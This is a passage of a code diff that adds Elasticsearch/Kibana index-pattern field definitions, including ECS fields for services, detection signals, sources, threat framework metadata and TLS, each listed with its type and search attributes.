"aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "server.user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "server.user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.ephemeral_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.node.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.state", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "service.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.ancestors.depth", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.ancestors.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.ancestors.index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.ancestors.rule", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.ancestors.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "integer" + ], + "name": "signal.depth", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "integer" + ], + "name": "signal.group.index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.action", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.category", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.original_event.created", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.dataset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.original_event.duration", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.original_event.end", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.kind", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.module", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.original", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.outcome", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.provider", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "signal.original_event.risk_score", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "signal.original_event.risk_score_norm", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.original_event.sequence", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.original_event.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.original_event.start", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.timezone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.original_event.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.original_time", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.parent.depth", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parent.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parent.index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parent.rule", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parent.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "signal.parents.depth", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parents.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parents.index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parents.rule", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.parents.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.author", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.building_block_type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.rule.created_at", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.created_by", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.enabled", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.false_positives", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.from", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.immutable", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.interval", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.language", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.license", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.max_signals", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "signal.rule.note", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.output_index", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.query", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.references", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "signal.rule.risk_score", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.risk_score_mapping.field", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.risk_score_mapping.operator", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.risk_score_mapping.value", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.rule_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.rule_name_override", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.saved_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.severity_mapping.field", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.severity_mapping.operator", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.severity_mapping.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.severity_mapping.value", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.size", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.tags", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.framework", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.tactic.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.tactic.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.tactic.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.technique.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.technique.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threat.technique.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.threshold.field", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "signal.rule.threshold.value", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.timeline_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.timeline_title", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.timestamp_override", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.to", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "signal.rule.updated_at", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.updated_by", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.rule.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "signal.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "signal.threshold_count", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.address", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "source.as.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "source.as.organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "source.as.organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "source.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "source.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "source.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "source.nat.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "source.nat.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "source.packets", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "source.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "source.user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "source.user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "source.user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "source.user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "source.user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tags", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.framework", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.tactic.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "threat.technique.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "threat.technique.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "threat.technique.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.cipher", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.certificate", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.certificate_chain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.issuer", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.ja3", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "tls.client.not_after", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "tls.client.not_before", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.server_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.subject", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.client.supported_ciphers", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.curve", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "tls.established", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.next_protocol", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "tls.resumed", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.certificate", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.certificate_chain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.issuer", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.ja3s", + "readFromDocValues": true, + "scripted": false, + 